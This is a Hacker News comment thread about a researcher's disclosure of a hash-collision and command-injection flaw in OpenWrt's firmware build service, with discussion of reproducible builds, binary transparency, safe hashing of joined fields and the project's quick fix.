Hacker News new | past | comments | ask | show | jobs | submit login
Compromising OpenWrt Supply Chain (flatt.tech)
584 points by udev4096 34 days ago | hide | past | favorite | 99 comments



A vulnerability not mentioned in the article is the normalisation of executing code that has been especially targeted to a specific user or specific device with no validation of reproducibility and no ability for anyone to verify this custom build and download service hasn't been generating backdoored builds.

One should want to ensure use of the same build of xz-utils that Andres Freund is using, or at least a build of xz-utils that other security researchers can later obtain to figure out whether supply chain implants are present in open source software[1].

There's a write up at Mozilla[2] from years ago describing an abandoned attempt by Mozilla to ensure their release builds are publicly logged in a Merkle tree. Google has written up their implementation for Pixel firmware builds but apps delivered through the Google Play Store seem to be vulnerable (unless there is another log I have been unable to find).[3] Apple is seemingly worse than Google on binary transparency with Apple's firmware and app distribution system targeting builds to individual devices with no transparency of builds.

For an example of binary transparency done well, Gentoo's ebuild repository (being a single Git repository/Merkle tree containing source checksums) possibly remains the largest and most distributed Merkle trees of open source software.

[1] Post xz-utils backdoor, some researchers (including some posting to oss-security about their efforts) undertook automated/semi-automated scans of open source software builds to check for unexplained high entropy files which could contain hidden malicious code. This is not possible to achieve with customised per-user/per-device builds unless every single build is made publicly available for later analysis and a public log (Merkle tree) accompanies those published builds.

[2] https://wiki.mozilla.org/Security/Binary_Transparency

[3] https://developers.google.com/android/binary_transparency/ov...


This is a nice idea, and one I also advocate for, however it's important to keep in mind that the idea of reproducibility relies on determinism. So much of what goes into a build pipeline is inherently nondeterministic, because we're making decisions at compile time which can differ from compilation run to compilation run, setting aside flags. In fact, that's the point of an optimizing compiler, as many reproducible build projects have discovered, turning on optimizations pretty much guarantees no reproducibility.


As long as the compiler is not optimizing by "let's give this 3 seconds of solving time, then continue if no better solution is found", then optimizing is not inherently nondeterministic.


Counterpoint: Archlinux is 89% reproducible with optimizations enabled. The only thing I see which is difficult to make reproducible is optimizations with a timeout.


Instead of using a timeout, an optimization that can must be cut off if the cost is excessive can keep some kind of operation or size count, where the count is strictly a function of the input. For example, an optimization based on binary decision diagrams (BDDs) can put a ceiling on the number of nodes in the BDD.


This is defeatist: compilers do not usually use the system RNG to make decisions, so what's happening is entirely accidental introduction of difference which propagates.

There is "intentional input" (contents of the source files), and "accidental input" (source file full paths, timestamps, layout of memory given to you by the OS, and so on). A reproducible build system should give the same output for the same "intentional input".

(the only place where you do see RNG driven optimization is things like FPGA routing, which is a mess of closed toolchains anyway. It has no place in regular software compilers.)


Why does an optimizing compiler introduce nondeterminism?

In my mind an optimizing compiler is a pure function that takes source code and produces an object file.


Well, lot of things can influence here. Multithreaded build, PGO, or even the different access order of the hash table inside the code optimizer can be a factor. Things are getting probalistic and thus somewhat nondeterministic: the build itself is nondeterministic but the runtime/final execution is deterministic


"Reproducible" isn't necessary for "not modified from what everyone else gets", and that still makes some attacks FAR harder (and easier to identify, as you know what the "normal" one is). And a published Merkle tree just makes it easier to verify "none of this has changed", as opposed to SHAs on a website that could change any time.


For sure, which is one of the big benefits of git + git tagging, but the issue is even if you know you received the same binary as someone else, without reproducible and auditable builds, you have no idea if that binary originated from the same code in the case of a targeted attack.


> For sure, which is one of the big benefits of git + git tagging

That's not enough for serious security though, because git is (still) using SHA1 instead of SHA256. You would need something extra, like a signed commit.

There's also the much simpler pitfall of an attacker just creating a branch named the same as a commit, in the hopes that people will accidentally check it out instead.


Then use git in sha2 mode. You just have to turn that on.


For Google Play: https://developer.android.com/guide/app-bundle/code-transpar...

As far as I know there's no centralised log, it's left up to app developers to publish their key/a log of transparency files.


Using a build service like that is apriori saying "i'm not valuable enough for a targeted attack".


> automated/semi-automated scans of open source software builds to check for unexplained high entropy files which could contain hidden malicious code

that's easily defeated though, you just "spread-out" the entropy.


It's easy to defeat right now because very few are currently thinking about secure build systems.

As an example, systemd's latest source tarball has two Web Open Font Format (WOFF) files in a documentation folder, a favicon.png, two few small screenshots and error messages that have unexplained 128bit identifiers. There are also translated strings (PO files) which could include obscure writing systems few can quickly audit, and thus could be advantageous to an attacker wanting to hide malicious code.

The problem with most build systems is the entire source tarball is extracted into a single location and any build scripts executed during build have access to everything in the source tarball. Gentoo's portage does apply sandboxing around an entire build process, just not internally between the different build stages.

Continuing the Gentoo example (being one of the better examples of sandboxed builds), ideally src_unpack could take a compressed tarball distributed from an upstream project and split files into multiple separate paths such as:

- source code files and build scripts needed to build binaries

- supporting test files needed to test the the built binaries

- supporting documentation/binary/high entropy data such as application icons, game data, documentation, etc that should be copied upon installation but aren't required to build binaries

Then src_prepare, src_configure, src_compile, src_test and src_install all have different sandbox configurations restricting which types of files separated during src_unpack each build phase can interact with.

For the systemd example above, some possible improvements could be:

1. Remove WOFF font files and use system default fonts, omit favicon.png and omit screenshots. Or only make WOFF font files, favicon.png and screenshots available for copying during the src_install phase, and ensure they are not readable by build scripts during src_configure and src_compile.

2. Generate error message identifiers using an explained approach such as hash_algorithm("systemd_error_" + name_of_error_constant) to generate nothing-up-my-sleeve identifiers.

3. Only provide access to and include in the build process any translation files of languages the user cares about. Or only make translation files available for copying during the src_install phase and possibly src_test too, and ensure they are not readable by build scripts.

These build system security techniques are obviously more work, but are generally straightforward to understand and implement. These technqiues are in the realm of possibility for smaller embedded Linux systems that may just be kernel + BusyBox + a few small scripts + a bespoke application + a handful of dynamic libraries. And for more complex Linux systems, these techniques are within the realm of possibility when targeted towards high value software, such as software requiring or often executed with root permissions and software requiring simultaneous access to the Internet and access to user files.


Yeah I remember Google's certificate transparency team basically designing firmware transparency for all of Linux (not just Android) as well.


Isn't the "".join also dangerous?

    get_str_hash(
        "".join(
            [
                build_request.distro,
                build_request.version,
                build_request.version_code,
                build_request.target,
                ...
You can shift characters between adjacent fields without changing the hash. Maybe you cannot compromise the system directly, but you could poison the cache with a broken image, or induce a downgrade.


Yes, one should use a hmac for hashing multiple inputs, for the reason you explained.

Edit: s/hmac/incremental hashing/


Not quite. HMAC helps to prevent length extensions attacks (if the underlying hash was vulnerable in the first place), and the secret prevents attackers from predicting the hash value (like OP did).

But HMAC doesn't help against ambiguously encoded inputs:

  hmac(key, 'aa'+'bb') == hmac(key, 'aab'+'b')
You want a way to unambiguously join the values. Common solutions are:

- prepending the length of each field (in a fixed number of bytes);

- encoding the input as JSON or other structured format;

- padding fields to fixed lengths;

- hashing fields individually, then hashing their concatenation;

- use TupleHash, designed specifically for this case: https://www.nist.gov/publications/sha-3-derived-functions-cs...


Wouldn’t “x”.join(…) be enough?


Possibly not:

  "x".join({'aa'+'bxb'}) == "x".join({'aaxb','b'})
The separator should not be able to show up in the inputs.


This is why I raised an eyebrow when TFA wrote,

> When I saw this, I wondered why it has several inner hashes instead of using the raw string.

The inner hash constrains the alphabet on that portion of the input to the outer hash, thus easily letting you use a separator like "," or "|" without having to deal with the alphabet of the inner input, since it gets run through a hash. That is, for a very simplistic use case of two inputs a & b:

  sha256(','.join(
    [sha256(a), sha256(b)]
  ))
If one is familiar with a git tree or commit object, this shouldn't be unfamiliar.

Now … whether that's why there was an inner hash at that point in TFA's code is another question, but I don't think one should dismiss inner hashes altogether.


I could see an attack vector here based on file/directory names or the full path. Different inputs could lead to the same order of enumerated checksums.


I'm not dismissing them, inner hashes returning a hexadecimal string fulfills the "the separator should not be able to show up in the inputs" constraint.


Thanks—that makes sense. I was struggling to come up with an example that would fail but I was just unconsciously assuming the separator wasn’t showing up naturally in the individual parts instead of explicitly considering that as a prerequisite.


Only if you can guarantee it that possible for someone to sneak in an input that already contains those "x" characters.


Yeah i confused hmac's with incremental hashing, i use both at once.


What do you mean by "incremental hashing"? Note that the Init-Update-Finalize API provided by many cryptography libraries doesn't protect against this - calling Update multiple times is equivalent to hashing a concatenated string.


I mean the same what you call Init-Update-Finalize.

link needed about the dysfunctional implementations.


No, these APIs are intentionally designed to be equivalent to hashing all data at once - i.e. to make it possible to hash in O(1) space.

There's nothing "disfunctional" about that.

"Incremental hash function" has a very different meaning and doesn't seem to have any relevance to what is discussed here: https://people.eecs.berkeley.edu/~daw/papers/inchash-cs06.pd...


I guess the PHP documentation is wrong then. Look at this: https://www.php.net/manual/en/function.hash-init.php


That page includes an example that shows PHP's incremental hashing is what you describe as "dysfunctional". It hashes "The quick brown fox jumped over the lazy dog." in 1 part, and in 2 parts, and shows that the resulting hashes are equal.


I did a mistake.


For anyone curious PHP ultimately uses this definition in their introduction portion of the hash extension:

> This extension provides functions that can be used for direct or incremental processing of arbitrary length messages using a variety of hashing algorithms, including the generation of HMAC values and key derivations including HKDF and PBKDF2.


For example, try running this Go program: https://go.dev/play/p/atvS3j8Dzg-

Or see the Botan documentation that explicitly says "Calling update several times is equivalent to calling it once with all of the arguments concatenated": https://botan.randombit.net/handbook/api_ref/hash.html

I've worked with many cryptography libraries and have never seen an Init-Update-Finalize API that works the way you think it does. It does not protect against canonicalization attacks unless you're using something like TupleHash.


That's why open source can never compete with business grade closed source stuff:

- they fixed the in 3 hours instead of making customers wait 6 months for a patch (if any)

- they did not try to sue the reporter of the issue

- they did not even tell the users to throw away the "outdated" but perfectly working devices, offering a small discount to buy new


Maybe make it clear you are being sarcastic here. English is not my native language, and my initial interpretation was that "they" in your post referred to the "business grade closed source stuff", and that OpenWRT is really a dangerous bet because they are guilty of all the things you listed.


To be fair, that initial confusion is the intended effect of OP's humor. Poe's law and all, but you did figure it out so the joke seems effective. Prefixing or suffixing with sarcasm warnings neuters the joke.


The sarcasm was abundantly clear in the first bullet point.


Did you read the article? OP was very clear that OpenWRT fixed the issue in under 3 hours.


Just why I love OpenWrt. They even ask the people that use screen readers like me to test the web interface to make sure that all is working as it should.


Whilst this is true, it looks like OpenWRT fixed the hash truncation but not the command injection.

I hope they're planning on fixing the command injection. As the blog post says, the created images are signed. Even without the signing, it's code execution from untrusted user input. And of course vulnerabilities can be strung together (just like in this hash collision case).


> Whilst this is true, it looks like OpenWRT fixed the hash truncation but not the command injection.

They did fix both AFAIK, the command injection fix is https://github.com/openwrt/asu/commit/deadda8097d49500260b17... (source: https://openwrt.org/advisory/2024-12-06).


Thanks for the correction and sorry for the mistake. I skimmed the changes but apparently not very well.


I have a router that from my ISP I am forced to use that has had a few CVEs ranging from not good to really bad. Most of which are years old. I can get a replacement but it's just the same model. They don't care about security at all and don't care about patching it, even though they have exclusive access rights to the router and can remotely log in to it. It's completely ridiculous.


The one I use looks scary too. And it came by default with a dumb password too. I wouldn't be surprised if it had a few CVEs hanging too.

> I have a router that from my ISP I am forced to use...

A friend of mine did impersonate the ISP's router's MAC address and used wireshark to sniff the traffic when the modem started. He then configured the ONT (which is physically inside a SFP plug, it's tiny) to establish the handshake/send the credentials.

I don't think the ISP has any idea at all :)


That's so satisfying! I want to try the same, it would make for a good blog post lol


It's a sad state of affairs, but anyone serious about security ought to consider the common ISP WiFi router to be a potentially hostile device and class it as part of the public side of the Internet. The usual advice is to put a firewall/router of your own running your preferred software, between the ISP device and your network.


What forces you to use it? You can’t bring your own router?


Routers supplied by AT&T here in the US for their fiber gigabit service do RADIUS authentication with the carrier gateway using certs built into the device. There used to be an older version of this router that had known vulnerabilities which made extracting those certs possible but they've since been patched and those certs have been invalidated.


Note that you can still downgrade an existing gateway, extract certs[0], then bypass the device [1]. I had to do this with OPNsense to avoid the latency buildup issue, which has been ongoing for months[2].

---

0 -- https://www.dupuis.xyz/bgw210-700-root-and-certs/

1 -- https://github.com/MonkWho/pfatt

2 -- https://www.reddit.com/r/ATTFiber/comments/1eqfouo/psa_att_n...


I believe you can set those to pass through mode and put a router/firewLl behind it without any kind of double NAT. Other than some kind of MITM, you have at least minimized the likelihood of someone using it as an entry point to your network.


This only works for a handful of open source projects with corporate backing and the resources to fix these issues quickly.

For most OSS projects, the maintainers are either too overworked or just don't feel like fixing security issues.


> For most OSS projects, the maintainers are either too overworked or just don't feel like fixing security issues.

Surely you can't be serious about "most" (= a clear majority) oss projects not fixing vulnerabilities in a reasonable time frame?


Not gonna lie, you had me in the beginning.


>they did not even tell the users to throw away the "outdated" but perfectly working devices, offering a small discount to buy new

Because they simply brick the device when updating and it's easier, faster, cheaper to buy a new device than to unbrick.


Home assistant and vlc anyone?


Ha was very user unfriendly when I last tried it ~3 years ago.

Yaml was necessary and it required a lot of fiddling to make z-wave work. Each blind was detected as ~5 things (2 useless or no idea what for)... Checking what was position, what power, ect was rather annoying.

I made work and something broke about a year later. I just replaced it with off the shelf stuff.


HASS configuration has gotten a lot better in the past few years. Almost everything can now be done via the UI, including automation and scripting, and it's one of the smoothest scripting GUIs I've used. It even supports cut/paste for visual blocks. And for those 5% cases, there's an inline YAML editor which will open (and validate) only the pertinent block of what I'm sure is a 1000-line YAML file for editing in-browser.

Z-Wave is still dodgy, but the migration to zwavejs has been an improvement and probably is as good as things will get with the state of Z-Wave being what it is.

It's still not perfect, but HASS has become one of my user-facing open-source success stories. Most of the remaining annoyances are out of their control at this point.


First - open source tool adjusted to the task it wasn’t made for in short time, only because it is open source and written without BuilderFactoryProvider. (already mentioned so I’m sorry, but it’s killing me every day) Big company would take probably -1 years to fix this, because it would just sue the guy, try to arrest him ASAP and never release patch. OpenWrt after getting information just took the insecure service offline, checked the report (while clients were already safe, because of the shutdown), made patch and released in 3 hours. Wow!


Loving this. I wonder how people even come up with an idea of truncating hashes. For what purpose or benefit?


Truncated hash functions are not vulnerable to length-extension attacks. But you usually take SHA512 and truncate to 256 bits. Anything shorter than this isn't really considered safe these days.


Sometimes it’s done to fit into an existing tool/database that has a preexisting limit. Or when the hash is used only as a locator rather than for integrity.

Not a good practice imo but people are pragmatic.


According to the commit, they did it to reduce the length of the downloaded filename and URL.


For when you need a smaller payload:

    According to @Reid's answer in [2] and @ThomasPornin's answer in [3], the idea of truncating hashes is fully supported by NIST, in fact SHA-224 is just SHA-256 truncated, SHA-384 is just SHA-512 truncated, etc.
https://security.stackexchange.com/a/97389


when you upgrade from sha1 to sha256 but you don't want to change your data format for storing the integrity checks / keys.


A SHA-1 is not 12 characters (either in digest bytes or hex nibbles)


First of all, nice writeup. I am a bit surprised that so much GPU power was needed to find such short collision but it was nice to see his implementation nevertheless.

Regarding the last section, is 40k a reasonable price for one month of security analysis? Does this mean that a good security researcher make about 500k/yr?


It means a good security research company might make $500k for a good researcher, if they could bring in enough work to keep them 100% utilised. Less actually, given paid time off.


Sick leaves, maternal leave, underutilized for sure (toilet, meetings etc).

Just for reference, I have had an audit from PwC and they were skeptical about our 65% time utilization because usually anything above 60% is fake at least partly. LOL, I thought, they were right, we ended up just about 60%.


Which, if past experience still hold, translates to something more like ~$165/yr + benefits.


That seems very reasonable to me. It seems like the pentest companies I have worked with in the past charge that much and just do a lazy nmap/metasploit scan and wrap it into a nice PDF.


> so much GPU power was needed

In post-LLM age one hour of compute on a 4090 is closer to "so less" than "so much". You can have that for less than $1.


2^(12*4) is 281,474,976,710,656 possible 12 character strings so seriously impressive that it can look through that many in an hour.


A bit over 4 hours at 18 billion per second, but yea. Impressively fast and also a completely reasonable amount of time for an attempt - the CPU version was 10m per second, which is most of a year to search the whole space.


>I immediately noticed that the length of the hash is truncated to 12, out of 64 characters.

Ouch...


Killer write up, very clever bit of code reading and exploit development.


What's this about hashcat performance being orders of magnitude different depending on arg order? Is it scanning the argument line for target pattern with every execution?


Could it be like a lock pick process where you start from the left and see if you get further or can throw away that guess, so by having the "choices" be at the beginning you don't have to make them again and again? (and for whatever reason doesn't/can't cache the prefix)? Or could it be like when counting

     100000000000
     010000000000
     110000000000
     001000000000
most of the variation is at the left and you only rarely see changes at the right? Would be interesting to get this answer from from someone who knows hashcat and isn't just pulling answers out of the air like me :)


Hashing is specifically done to prevent just this. (Just reacting to the comment here, haven't grokked the specifics.)


That just makes it even more confusing that it uses longer to vary the right than the left – is the specific hash algorithm used not "balanced" (or whatever the term of art is) the way it ideally/theoretically should be?


Very well written and easy to follow description of your attack.


The title uses the term "supply chain" but it appears nowhere in the blog post. I keep seeing this term used by "cybersecurity" researchers and software developers in ways that seem to differ from the definition I learned in school. .

From Wikipedia:

"A supply chain is a complex logistics system that consists of facilities that convert raw materials into finished products and distribute them^[1] to end consumers^[2] or end customers.^[3]"

    1. ^ Ganeshan, R. and Harrison, T. P., An Introduction to Supply Chain Management, updated 22 May 2005, accessed 29 June 2023

    2. ^ ^a ^b Ghiani, Gianpaolo; Laporte, Gilbert; Musmanno, Roberto (2004). Introduction to Logistics Systems Planning and Control. John Wiley & Sons. pp. 3-4.  ISBN 9780470849170. Retrieved 8 January 2023.

    3. ^ ^a ^b ^c Harrison, A. and Godsell, J. (2003), Responsive Supply Chains: An Exploratory Study of Performance Management, Cranfield School of Management, accessed 12 May 2021
Was https://sysupgrade.openwrt.org set up for commercial suppliers of OpenWRT. How about https://firmware-selector.openwrt.org

I always assumed commercial suppliers compiled from source to add their own modifications, and then created their own images.

As a consumer of OpenWRT, I compile from source or use "official" images.


The device updates can be supplied by a supplying service. The device (and its user as the end consumer) is not attacked directly but through its update supply chain. This is why it's called supply chain attack.

When somebody intercepts your Christmas presents to add a bomb to your new pager, it is also a supply chain attack. Even if you use the pager for work and the bomb targets your business partner. If somebody throws the bomb directly at the target it is not a supply chain attack.

Supply chains are often less secured than direct attack vectors.


Nicely done. Good write up too. I liked the bits about making hashcat do what you wanted.


Hi, I'm the one who created this services within a "Google Summer of Code" some 7 years ago and been maintaining it since. It's my first "larger" project and while it started as a short Python project, I eventually became a OpenWrt project member since the build system itself required so many changes.

I'd be very happy for further audits and reviews of the code, after multiple years of low interested, it now produces and caches about 1000 individual firmwares a day. I think it's only a question of time until other issues come up...


OpenWrt is also very difficult to safely upgrade on some devices which I would also consider as a huge downside. I finally gave up and bought an old Dell off eBay and installed OpnSense and am much happier.



Sure does, but I don't evaluate firewalls based on the quality of their marketing materials.


Some devices are hard to upgrade in large part because they were never intended to be used with things like OpenWRT.

To that end: While it can be nice that OpenWRT runs on a quirky compact all-in-one MIPS-based consumer router-box (or whatever), the software also runs just fine on used Dells from eBay.


That was an excellent report and a really decent technical explanation. Good to see how quickly OpenWrt (one of my favorite open-source projects) fixed and addressed this vulnerability!


Kudos to the researcher for finding this, and to the openwrt team for the impressive response.

I know that opnsense is preferred over pfsense when it comes to performance, but does openwrt compete at speeds at or above 10gig?


Is there any way to fix the command injection solely in the Makefile?


If Bash is used as the SHELL for make[0], then it might be possible with the ${parameter@Q} parameter expansion[1]?

I would still rather resort to python's shlex.quote[2] on the python side of things tbh.

[0]: https://stackoverflow.com/questions/589276/how-can-i-use-bas...

[1]: https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.... (at the end of the chapter)

[2]: https://docs.python.org/3/library/shlex.html#shlex.quote


I'm getting an error when I try to view this:

Secure Connection Failed

An error occurred during a connection to flatt.tech. SSL received a record that exceeded the maximum permissible length.

Error code: SSL_ERROR_RX_RECORD_TOO_LONG

No-one else?


Works for me, no errors, using Firefox. But a quick peek at their Certificate Details shows several dozen Subject Alt Names.

That's probably a corner case which your browser's dev's failed to test.


Not even on my company's crappy proxy (not supporting QUIC and having problems with HTTP/2 sometimes). Works, loads rather quickly.


Very cool article, security researchers are incredibly creative and scary smart.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: